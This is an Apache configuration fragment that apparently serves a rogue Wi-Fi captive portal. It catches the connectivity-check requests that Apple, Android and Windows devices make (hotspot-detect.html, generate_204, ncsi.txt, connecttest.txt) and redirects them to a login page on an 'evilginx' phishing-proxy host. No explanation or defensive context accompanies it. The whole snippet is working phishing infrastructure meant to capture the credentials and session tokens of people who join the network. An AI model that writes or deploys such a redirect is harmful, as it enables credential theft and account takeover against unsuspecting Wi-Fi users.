        SSLEngine Off
        RewriteEngine On
        RewriteCond %{REQUEST_URI} ^/hotspot-detect.html [NC,OR]
        RewriteCond %{REQUEST_URI} ^/generate_204 [NC,OR]
        RewriteCond %{REQUEST_URI} ^/ncsi.txt [NC,OR]
        RewriteCond %{REQUEST_URI} ^/connecttest.txt [NC]
        RewriteRule ^(.*)$ https://evilginx.alux.cc/login [R=302,L]
